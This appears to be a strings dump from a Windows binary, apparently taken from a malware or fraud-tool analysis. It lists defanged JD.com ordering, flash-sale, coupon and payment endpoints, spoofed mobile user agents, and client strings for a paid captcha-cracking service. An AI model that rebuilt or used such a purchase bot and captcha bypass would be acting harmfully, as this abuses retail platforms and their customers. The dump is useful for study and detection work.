if (l.length < 5) {
for (var g = h.length - 1; g >= 0; g--) {
var g = h.split("");
g.reverse();
return g.join("")
f.prototype = {
return this.hash(g) & (g.length - 1)
var g = l.length;
k = 31 * k   l.charCodeAt(m  );
var g = this.ShieldEncoder.encode(s,"li43fevlisdfil234li");
hXXp://m.jd.hk/pay/pay.action?orderId=
hXXp://m.jd.hk/norder/submit.action?sid=
payParamsObject.needVerify
hXXps://pay.m.jd.com/newpay/verify.action
hXXp://home.m.jd.com/user/waite4Payment.action?sid=
hXXp://p.m.jd.com/pay/pay.action?orderId=
@payParamsObject.indexInfo
&systemKey=user_detail&token=juies88kie6tg32h322h32gv22&_=
hXXp://hgrpcpop.jd.com/queryCustomsStates/getOrderInfoJsfResult.json?callback=jQuery6703167&orderId=
hXXp://blsfz.jd.hk/idCard/fill_
hXXp://blsfz.jd.hk/idCard/saveIdCard.do?orderId=
errorMsg
hXXp://tuan.jd.com/gift/buyGift.html?giftId=
&_=14159337163
hXXp://tuan.jd.com/api/address.action?actionDo=GetLastSubmitSuccessOrder&teamId=0&callback=jsonp
hXXp://tuan.jd.com/api/address.action?callback=jsonp
hXXp://tuan.jd.com/gift/submitGift.action
&giftOrder.zipCode=&giftOrder.quantity=
&giftOrder.email=
&giftOrder.phone=
&giftOrder.mobile=
&giftOrder.where=
&giftOrder.realName=
&giftOrder.townName=
&giftOrder.townId=
&giftOrder.countyName=
&giftOrder.countyId=
&giftOrder.cityName=
&giftOrder.cityId=
&giftOrder.provinceName=
&giftOrder.provinceId=
&giftOrder.giftId=
giftOrder.userPayPwd=
hXXp://item.m.jd.com/ja.jsp
hXXp://p.m.jd.com/cart/add.json?wareId=
.html?resourceType=cart&resourceValue=unknown&sid=
hXXp://item.m.jd.com/product/
hXXp://p.m.jd.com/cart/check.json?checked=7&sid=
cart.PriceShow
cart.vendors
cart.vendors[
hXXp://m.jd.hk/norder/order.action?enterOrder=true&sid=
hXXp://v.m.jd.com/international/index.action?returnurl=http://m.jd.hk/norder/order.action?enterOrder=true
hXXp://p.m.jd.com/norder/calcYunfeeVm.action?sid=
hXXp://p.m.jd.com/ja.jsp
hXXp://home.m.jd.com/newAllOrders/newAllOrders.json?sid=
hXXp://home.m.jd.com
hXXp://home.m.jd.com/user/cancelOrder.json?orderId=
cart.code
hXXp://p.m.jd.com/cart/remove.json?wareId=
Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
].item.Skus[0].Id
].item.Skus[0].Num
cartJson.vendors
@@1@@16@@
hXXp://p.m.jd.com/cart/addWares.json?wareInfos=
cartJson.PriceShow
hXXp://p.m.jd.com/norder/couponsNewRule.action?couponsId=&sid=
hXXp://p.m.jd.com/norder/couponsNewRule.json?couponsId=&sid=
].key
].canUsed
].couponStyle
].selected
].quota
].discount
].timeBegin
].timeEnd
&useOrCancelCouponPara.Selected=false&useOrCancelCouponPara.Id=
hXXp://p.m.jd.com/norder/useOrCancelCoupon.json?useOrCancelCouponPara.Key=
&useOrCancelCouponPara.Selected=true&useOrCancelCouponPara.Id=
Coupons[0].quota
Coupons[0].discount
Coupons[0].key
Coupons[0].id
].couponType
hXXp://p.m.jd.com/norder/giftcards.action?sid=
hXXp://p.m.jd.com/norder/updateGiftCards.action?sid=
http://divide.jd.com/user_routing?skuId=
jdapp;android;3.2.1;4.3;
/mobile/koFail.html
.jd.com
.jd.com/validateM/repeatGoToOrder?skuId=
jdapp;android;4.2.0;4.3;
.jd.com/mAsync/getUsualAddressList.action?m=true&sid=
;psq/27;ref/;pap/JA2015_311210|4.4.3|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
;network/wifi;osp/android;apv/4.4.3;osv/4.4.2;uid/
jdapp;android;4.4.3;4.4.2;
&orderParam.mobileKey=
&orderParam.email=&orderParam.mobile=
&orderParam.name=
&orderParam.provinceName=
orderParam.provinceId=
.jd.com/seckillM/saveConsignee.action?sid=
.jd.com/seckillM/editConsignee.action?sid=
.jd.com/seckillM/seckill.action?sid=
mobileKey" value="
.jd.com/mAsync/calcuOrderPrice.action?sid=
hXXp://marathon.jd.com/seckillM/seckill.action?skuId=
&orderParam.invoiceTitle=
&orderParam.codTimeType=
&orderParam.email=&orderParam.paymentType=
&password=&orderParam.name=
.jd.com/seckillM/submitOrder.action?skuId=
/seckillSuccess.action
.jd.com/seckillM/getCouponList.action?sid=
;psq/10;ref/;pap/JA2015_311210|5.1.0|ANDROID;usc/;usp/;umd/;utr/;adk/;ads/;Mozilla/5.0 (Linux; Android 4.4.2; NoxW Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
;network/wifi;osp/android;apv/5.1.0;osv/4.4.2;uid/
jdapp;android;5.1.0;4.4.2;
.jd.com/mAsync/cancelCoupon.action?m=true&sid=
hXXp://marathon.jd.com/mAsync/calcuOrderPrice.action?sid=
.jd.com/mAsync/useCoupon.action?m=true&sid=
Mozilla/5.0 (Linux; U; Android 5.1.1; zh-cn; Mi-4c Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 Chrome/37.0.0.0 MQQBrowser/6.5 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.163.400 QQBrowser/9.3.7175.400
hXXp://item.m.jd.com/ware/judgeOrder.json?wareId=
.html?sid=
com.tencent.mtt
hXXp://marathon.jd.com
.jd.com/mAsync/getJBeanInfo.action?sid=
(*.txt)
hXXp://odo.jd.com/oc/toolbar_confirmDeliver?action=confirmDeliver&orderid=
hXXp://odo.jd.com/order/toolbar_confirmDeliver?action=confirmDeliver&orderid=
hXXp://order.jd.com/normal/confirmReceipt.action?orderid=
hXXp://order.jd.com/normal/canReceiveSuccess.action
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
password=
hXXp://try.jd.com/details/clickApply.action?callback=jQuery970631&activityId=
hXXp://try.jd.com/
isLogin
hXXp://yushou.jd.com/youshouinfo.action?sku=
codeUrl" name="key" value="
keyForSku" name="key" value="
hXXp://yushou.jd.com/check/validateRandomCode.action
hXXp://yushou.jd.com/toYuyue.action?sku=
hXXp://yushou.jd.com/yuyue.action?mobileCode=&mobile=
hXXp://ware.m.jd.com/client.action?functionId=isAppoint&uuid=
sec_comp.bsid
&clientVersion=4.4.3&build=23599&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=5.1.1&screen=1920*1080&partner=exun007&area=&networkType=wifi&st=
hXXp://i.m.jd.com/client.action?functionId=secCaptchaCode&body=
hXXp://ware.m.jd.com/client.action?functionId=appoint&uuid=
wareInfo.yuyueInfo.yuyueNum
hXXp://passport.jd.com/uc/login?ltype=logout
VVV.jd.com
&clientVersion=4.4.1&build=23145&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
wareInfo.basicInfo.name
hXXp://ware.m.jd.com/client.action?functionId=skuDyInfo&uuid=
wareInfo.jprice.value
wareInfo.pcPrice.value
SSSSSh`Q
~%SSh
MFC42.DLL
WSOCK32.dll
MSVCP60.dll
%s_next%d.txt
d%sd%sd:d
%s%sMdd%s
%s%sM%sd
LogFiles\OperationLog\
socket (%d)
(%d)socket
Únd%d
(%d)[%d-%d=%d]
(%s) %s
TimeOut = %d
d.woniudati.com/ip.htm
dll.woniudama.com
<W><G>%s</G><C>L</C><T>1</T><N>%s</N><P>%s</P><DLL>%s</DLL><IID>%s</IID></W>
<W><G>%s</G><C>A</C><T>1</T><S>%s</S><I>
<W><G>%s</G><C>E</C><T>1</T><Id>%s</Id></W>
<W><G>%s</G><C>B</C><T>1</T></W>
%s|%s
9.tdj.h
hCRTkP
hCRTrS
hCRTgS
hCRTbS
CRTr
CRTg
CRTb
lFtP
tcpO
tcpOt1
tcpOtQ
tcpOtN
tcpOt.
Multipage Encode, Unsupported operation for this format
Page %d
Save PSD not supported
Save RAW not supported
Save WMF not supported
Unsupported WBMP type
1.5.0
compression type not supported
Portable Graymap/Pixmap (PNM)
? %s %s %d %ld %ld
error: BMP format does not support color space
tileno = %d; len = %d; partno = %d; numparts = %d
prec[%d] = %d; sgnd[%d] = %d; hsamp[%d] = %d; vsamp[%d] = %d
tilewidth = %d; tileheight = %d; tilexoff = %d; tileyoff = %d;
width = %d; height = %d; xoff = %d; yoff = %d;
caps = 0xx;
prcwidth[%d] = %d, prcheight[%d] = %d
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx;
prg = %d; numlyrs = %d;
numdlvls = %d; qmfbid = %d; mctrans = %d
csty = 0xx;
cblkwidthval = %d; cblkheightval = %d; cblksty = 0xx; qmfbid = %d;
compno = %d; csty = 0xx; numdlvls = %d;
compno = %d; roisty = %d; roishift = %d
expn[%d] = 0xx; mant[%d] = 0xx;
qntsty = %d; numguard = %d; numstepsizes = %d
compno = %d; qntsty = %d; numguard = %d; numstepsizes = %d
seqno = %d;
ind=%d; len = %d;
le[%d] = %d
rs[%d] = %d; re[%d] = %d;
cs[%d] = %d; ce[%d] = %d;
po[%d] = %d;
hoff[%d] = %d; voff[%d] = %d
regid = %d;
len = %d;
type = 0xx (%s);
Creator: JasPer Version %s
lyrno=d cmptno=d rlvlno=d bandno=d prcno=d cblkno=d passno=d
lyrno = d
success %d goodthresh %f
MbP?maxlen=ld actuallen=ld thresh=%f
min rdslope = %f max rdslope = %f
cblk ] ] ] ]
prc ] ] ] ] (] ])
band ] ] ] ]
rlvl ] ] ] ]
tcmpt ] ] ] ]
invalid code block width %d
invalid code block height %d
warning: ignoring invalid option %s
warning: invalid intermediate layer rates specifier ignored (%s)
ignoring bad rate specifier %s
ignoring invalid progression order %s
ignoring invalid mode %s
unsupported image type
error: too few guard bits (need at least %d)
CODE BLOCK %d
CODE BLOCK GROUP %d
BAND %d
xs =%d, ys = %d, xe = %d, ye = %d, w = %d, h = %d
RESOLUTION LEVEL %d
ICC Profile CS x
error: unsupported compression type
box type %s
warning: palettized images not fully supported
error: encoding method not supported
error: RLE encoding method not supported
error: unsupported color space
unsupported BMP encoding
error: unsupported BMP encoding
THE BMP FORMAT IS NOT FULLY SUPPORTED!
no palettized image support for BMP format
%s%ld
warning: support for signed sample data requires use of nonstandard extension to PNM format
data=%s
component tlx=%ld tly=%ld sampperx=%ld samppery=%ld width=%ld height=%ld prec=%d sgnd=%d
error: PNM support required
warning: ignoring unsupported options
(%f, %f, %f)
entry[%d] = %f
gamma = %f
number of entires = %d
maclen = %d
sccode = %d
uclangcode = %d; uclen = %d
ascii = "%s"
string = "%s"
numintabents=%d, numouttabents=%d
e[%d][%d]=%f
numinchans=%d, numoutchans=%d, clutlen=%d
x:
1.900.1
packet offset=ld prg=%d cmptno=d rlvlno=d prcno=d lyrno=d
coding pass failed passtype=%d segtype=%d
csid=%d
method=%d; pri=%d; approx=%d
channo=%d; type=%d; assoc=%d
cmptno=%d; map=%d; pcol=%d
numchans = %d
LUT[%d][%d]=%d
numents=%d; numchans=%d
type=%c%s%c (0xx); length=%d
%s: Out of memory in %s
?%s: decoder table overflow
%d.%d.%d
%d %d
%d,%d
%d %d %d
/.badpixels
%s is not a valid PGM file!
%s has the wrong dimensions!
Scaling with darkness %d, saturation %d, and
%s: Cannot use camera p->white balance.
Median filter pass %d...
11124811248488
012347800000005896
%d:%d:%d %d:%d:%d
@0134567028
023457000000006000
012346000000000000
.Ad530flex
%d:%d:%d
%*s %s %d %d:%d:%d %d
v%d %dx%d
A%s %s
Converting to %s colorspace...
?d:d:d d:d:d
12435867
?Unknown option "-%c".
Non-numeric argument to "-%c"
114111111422
%f %f %f
Ixpress %d-Mp
50132467
Failed to read metadata from %s
Reading metadata from %s ...
%s: You must link dcraw with libjpeg!!
%dx%d
1.2.5
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Bogus message code %d
%ld%c
?0123456789ABCDEFlibpng warning: %s
libpng error: %s
Buffer error in compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Incomplete compressed datastream in %s chunk
Unknown zTXt compression type %d
gamma = (%d/100000)
gx=%d, gy=%d, bx=%d, by=%d
wx=%d, wy=%d, rx=%d, ry=%d
incorrect gamma=(%d/100000)
Ignoring iCCP chunk with declared size = %u and actual length = %u
NULL row buffer for row %ld, pass %d
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
%s: Must set "PlanarConfiguration" before writing data
%s: No space for %s arrays
%s: Must set "ImageWidth" before writing data
%s: File not open for writing
%s: No space for output buffer
%s: No space to expand strip arrays
%d: Sample out of range, max %d
Integer overflow in %s
%s: Invalid InkNames value; expecting %d names, found %d
%s: Bad value %u for "%s" tag
%s: Invalid %stag "%s" (not supported by codec)
%s: Bad field type %d for "%s"
%s: Failed to allocate space for list of custom values
%s: Bad value %d for "%s" tag
%s: Sorry, cannot nest SubIFDs
Nonstandard tile width %d, convert file
Nonstandard tile length %d, convert file
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Error fetching directory link
%s: Error fetching directory count
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: No space for data buffer at scanline %ld
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Invalid strip byte count %lu, strip %lu
%s: Data buffer too small to hold tile %ld
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
This is a BigTIFF file. This format not supported
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
Sorry, can not handle images with %d-bit samples
Sorry, LogL data must have %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle separated image with %s=%d
Missing needed %s tag
Failed to allocate memory for %s (%ld elements of %ld bytes each)
Error writing data for field "%s"
%s: Error writing SubIFD directory link
M"%s": Information lost writing value (%g) as (unsigned) RATIONAL
AsShotPreProfileMatrix
AsShotICCProfile
AsShotWhiteXY
AsShotNeutral
InteroperabilityIFDOffset
Internal error, unknown tag 0x%x
Tag %d
Compression algorithm does not support random access
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s: Cannot determine size of unknown tag type %d
%s: TIFF directory is missing required "%s" field
incorrect count for field "%s" (%u, expecting %u); tag trimmed
incorrect count for field "%s" (%u, expecting %u); tag ignored
%s: Can not read TIFF directory
%s: Can not read TIFF directory count
%s: Seek error accessing TIFF directory
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %u)
unexpected count for field "%s", %u, expected 2; ignored
cannot read TIFF_ANY type %d for field "%s"
Cannot handle different per-sample values for field "%s"
%s: cannot handle zero strip size
%s: cannot handle zero tile size
%s: cannot handle zero scanline size
%s: Wrong "%s" field, ignoring and calculating from imagelength
%s: Bogus "%s" field, ignoring and calculating from imagelength
%s: TIFF directory is missing required "%s" field, calculating from imagelength
%s: cannot handle zero number of %s
Registering anonymous field with tag %d (0x%x) failed
%s: unknown field with tag %d (0x%x) encountered
%s: wrong data type %d for "%s"; tag ignored
%s: invalid TIFF directory; tags are not sorted in ascending order
%s: Failed to read directory at offset %u
%s compression support is not configured
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
?%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
Inappropriate photometric interpretation %d for SGILog compression; %s
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for LogLuv state block
%s: %s
%s: zlib error: %s
%s: Not enough data at scanline %d (short %d bytes)
%s: Decoding error at scanline %d, %s
%s: Encoder error: %s
%s: Bad code word at line %u of %s %u (x %u)
%s: Uncompressed data (not supported) at line %u of %s %u (x %u)
%s: %s at line %u of %s %u (got %u, expected %u)
%s: Premature EOF at line %u of %s %u (x %u)
Row pixels integer overflow (rowpixels %u)
%s: No space for Group 3/4 reference line
C Fax DCS: %s
Fax SubAddress: %s
(%u = 0x%x)
%sEOL padding
%s2-d encoding
%suncompressed data
%s: No space for state block
JpegRestartInterval: %u
JpegProc: %u
OJPEG encoding not supported; use new-style JPEG compression instead
Unknown marker type %d in JPEG data
Subsampling values [%d,%d] are not allowed in TIFF
Subsampling inside JPEG data does not match subsampling tag values [%d,%d] (nor any other values allowed in TIFF); assuming subsampling inside JPEG data is correct and desubsampling inside JPEG decompression
Subsampling inside JPEG data [%d,%d] does not match subsampling tag values [%d,%d]; assuming subsampling inside JPEG data is correct
Subsampling tag is not set, yet subsampling inside JPEG data [%d,%d] does not match default values [2,2]; assuming subsampling inside JPEG data is correct
SamplesPerPixel %d not supported for this compression scheme
JPEG strip/tile size exceeds expected dimensions, expected %dx%d, got %dx%d
Decompressor will try reading with sampling %d,%d.
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d.
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Not enough data at scanline %d (short %ld bytes)
LZWDecode: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecode: Corrupted LZW table at scanline %d
LZWDecode: Strip %d not terminated with EOI code
LZWDecodeCompat: Corrupted LZW table at scanline %d
LZWDecodeCompat: Wrong length of decoded string: data probably corrupted at scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %ld bytes)
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Floating point "Predictor" not supported with %d data format
"Predictor" value %d not supported
Out of memory allocating %d byte temp buffer.
%u (0x%x)
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
?#%X.y
Broken pipe
Inappropriate I/O control operation
Operation not permitted
\\.\Scsi%d:
\\.\PhysicalDrive%d
,./1234567
Referer:%s
Cookie: %s
CInternetFileOperator
InternetOpen(%s) failed
InternetOpenUrl(%s) failed(err=%d, header=%s)
HttpQueryInfo(%s, %d) failed(err=%d)
Request URL(%s) return %s
HttpQueryInfo(%s, ContextType) failed(err=%d)
ReadInternetFile(%s, ContextType=%s) failed
Alloc cookie memory failed(len=%d)
InternetReadFile(%d) failed(err=%d)
Alloc file memory failed(datalen=%d, retlen=%d)
FIELD_ID_NEW_PASSWORD
FIELD_ID_FILE_SERVER_PORT
FIELD_ID_MAIN_SERVER_PORT
FIELD_ID_FILE_URL
FIELD_ID_FILE_URL_LEN
FIELD_ID_KEY
FIELD_ID_PASSWORD
ip=%s
C:\work\VCodeServer\Common\include\IPacketDataWriterImpl1_0.h
Login_Req
Login_Rsp
AppReportVCodeRight_Req
AppReportVCodeRight_Rsp
[%7lu]Get packet define failed(seq=%lu, cmd=%lu)
[%7lu]Get packet define and session data failed(seq=%lu, cmd=%lu)
[%7lu]Set offset error(seq=%lu, cmd=%lu)
[%7lu]MAC error(seq=%lu, cmd=%lu)
[%7lu]Packet fixed length error(dwFixLen=%d)
[%7lu]Packet head VCC Verify error(src=%d, comp=%d, seq=%lu, cmd=%lu)
[%7lu]Command(%d) not support(seq=%lu)
[%7lu]Packet length(%d) error(seq=%lu, cmd=%lu)
[%7lu]Packet type(%d) error(seq=%lu, cmd=%lu, srcdest=%d)
[%7lu]Get Memory Failed(seq=%lu, cmd=%lu)
[%7lu]Packet ID not found(srcdest=%d, cmdID=%d)
verify code of encrypt key error
verify code of MAC key error
Field(%s) offset(%d) is greater than data length(%d)
Decrypt field(%s) failed
Offset(%d) > Len(%d) [packect=%s, field=%s]
EncryptData error [packect=%s, field=%s]
[%7lu]Packet ID not found(PacketID=%d, cmd=%lu, srcdest=%d)
[%7lu]Session ID not found(cmd=%lu, srcdest=%d, sessionid=%d)
open.baidu.com
time.nist.gov
asia.pool.ntp.org
cn.ntp.org.cn
time.mayihd.com
WSASocket Failed ,code=%d
WSACreateEvent() Failed , code=%d
Connect fail(err=%d, server=%d, port=%d, socket=%d, time=%d)
Connect server(%d:%d) success(socket=%d)
Connect server(%d:%d) failed(socket=%d, time=%d)
Connect server(%d:%d) success(socket=%d): connect return: %d
send fail(err=%d, socket=%d)
Receive fail(err=%d, socket=%d)
WSAEventSelect() Failed ,code=%d
WSAEnumNetworkEvents(%d,%d) Failed ,code=%d
events.lNetworkEvents(%d) & %d != 0 (socket=%d, err=%d)
events.lNetworkEvents & FD_CLOSE != 0 (socket=%d, err=%d)
WSAEnumNetworkEvents(%d,%d) exception ,ret=%d, lNetworkEvents=%d, LastError=%d
Synchronize time success by %s:%d
GET /special/time/ HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: open.baidu.com
window.baidu_time(
HTTP/
Exit %s(used %dms)
%u.%u.%u.%u
RespCode=%d(seq=%lu)
user name is empty(seq=%lu, cmd=%lu)
CrackCaptchaClient.ini
%s\%s
Software ID error(%s)
Enter %s
InnerLogin
%s login(softname=%s)
byRespCode=%d
%s logoff(softname=%s)
RegisterUser(%s) success
ReadUserInfo(%s) success
start decode: url=%s, len=%d, timeout=%d, type=%d
Internet add task failed(ProcessID=%u)
start decode: datalen=%d, ext=%s, len=%d, timeout=%d, type=%d
start GetResult: processID=%u, uTimeout=%u
GetResult Error: processID=%u
GetResult Success: processID=%u, VCode=%s, id=%u
vcode buffer len(%d) < vcode len(%d)
GetDecodeResult success(uProcessID=%d, vcodeid=%lu, VCode=%s)
ReportDecodeCorrectness success(vcodeid=%lu)
QueryUserBalance success(user=%s, balance=%d)
Recharge success(user=%s, cardno=%s)
FetchVCodeImage success(processid=%d)
ProcessID(%d) not in WorkerFetchResult
GetFetchVCodeImageResult finish(processid=%d, uVCodeID=%lu, err=%d, RespCode=%d)
RefreshVCode Reader empty(processid=%d)
RefreshVCode: Cookie is empty(processid=%d)
RefreshVCode no data(processid=%d)
RefreshVCode no data(processid=%d, file is downloading)
RollbackVCode success(count=%d)
stat buffer len(%d) <= stat info len(%d)
QueryStatistics success(stat=%s)
Get Memory Failed, BlockCount=%d
[%d]connected to server(ip=%d, port=%d)
[%d]Unpack error(seq=%lu, cmd=%lu)
[%d]received: seq=%lu, cmd=%lu, rsp=%d
[%d]RequestDecode no record: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no ResultSeq2DecSeq: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no record: seq=%lu, cmd=%lu, rsp=%d
[%d]SetReqSeqNoData failed(seq=%lu, cmd=%lu, rsp=%d)
[%d]Data sent(len=%d)
[%d]socket closed
nolog.ini
dama.log
dama_bak.log
d-d-d d:d:d.d
[%d]request: seq=%lu, cmd=%lu
[%d]Pack error
[%d]Add Send Data error
Create Packet Writer failed(cmd=%lu)
socket connector connect failed(%s)
Inner login failed
server1.mayihd.com
server.mayihd.com
RetFileNameLen(%d) <= dwPrexLen(%d) or url(%s) not include prex
Get Var memory failed(len=%d)
SOCKFILE://%s/%s
[%d]call PacketBuiler.Pack failed(seq=%lu,cmd=%lu)
call BlockingClientSocket.Connect failed(ip=%s)
call BlockingClientSocket.Send failed(len=%d)
call BlockingClientSocket.Receive failed(recvlen=%d, left=%d)
recv data(len= %d)
Packet Length error(recvlen=%d)
call PackBuilder.Unpack failed
RespCode=%d
File Server IP error(filename=%s)
Start download file(%s)
failed to download file(%s, used %dms)
succeed to download file(%s, used %dms)
Get Var Memory failed(len=%d)
call DownloadFile(%s) failed
call FileOp.DownloadFile(%s) failed
\Install.exe
CreateFile(%s) failed(err=%d)
WriteFile(%s,len=%d) failed(err=%d)
download file from internet failed(%s)
start upload file(seq=%d) ...
failed upload file(seq=%d, err=%d)
end upload file(seq=%d) ...
Failed to DownloadFile(%s, resp=%d)
Picture file name Count = 0(%s)
Picture (%s) is invalid(%s)
Picture Count = 0(%s)
failed to encode dest image (%s)
Send HeatBeat init failed(resp=%d, usedtime=%dms)
Send HeatBeat failed(resp=%d, usedtime=%dms)
Send HeatBeat success(seq=%d, usedtime=%dms)
DataLen(%d) is too large
Allocate memory(%d) failed
worker socket sleep timeout:%d
WSAEnumNetworkEvents(s=%d, event=%d) failed(err=%d)
close event waited[events.lNetworkEvents & FD_CLOSE)=%d, err=%d]
[%7lu]send(sock=%d, len=%d) failed(err=%d)
[%7lu]recv(sock=%d, len=%d) failed(err=%d)
OnSocketDataReceived return %d
CrackCaptchaAPI.log
CrackCaptchaAPI_bak.log
Failed to CreateFile(%s): error=%d
Failed to GetFileSize(%s): dwLen=%d
Failed to ReadFile(%s): error=%d
Failed to ReadFile(%s): Len=0
Failed to EncodeImage(%s)
C:\work\VCodeServer\Release\MayiAPI.pdb
InternetOpenUrlA
PeekNamedPipe
MayiReportError
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.?AUILogInterface@@
.?AVCServerFileOperateWorkerThread@CServerFileOperateThread@@
.?AVCServerFileOperateThread@@
>'>,>3>8>
:-:2:9:>:
6,61686=6{6
=->3>8>>>
7$7-797E7R7Y7d7l7t7}7
2 34383<3@3
> >$>(>,>0>
2-222[3{3
2*313&4.4
1'14182]2
7#7,757>7
40=0"232
9#9-989@9
=!=$=)=@={=
4A4F4O4X4q4
3,5151767
< <$<(<,<0<4<8<<<@<
6 6$6(6,606
5 5@5\5`5
6 6<6@6`6
time.dama2.com
CrackCaptcha.log
CrackCaptcha_bak.log
server1.dama4.com
server.dama4.com
C:\work\VCodeServer\Release\CrackCaptchaAPI.pdb
1$1)1@1.363
94989<9@9
:8:<:@:~:
4$4)4.4:4
: :$:(:,:0:4:8:<:@:
02373^4}4
: :$:(:]:
< <$<(<,<0<4<8<<<
7 7$7(7,7
,0004080
0024282<2
? ?$?(?,?7?
0/141`1{1
9$9(9,9094989<9
1 2%2%3*3
5 5<5@5`5|5
6 6@6\6`6
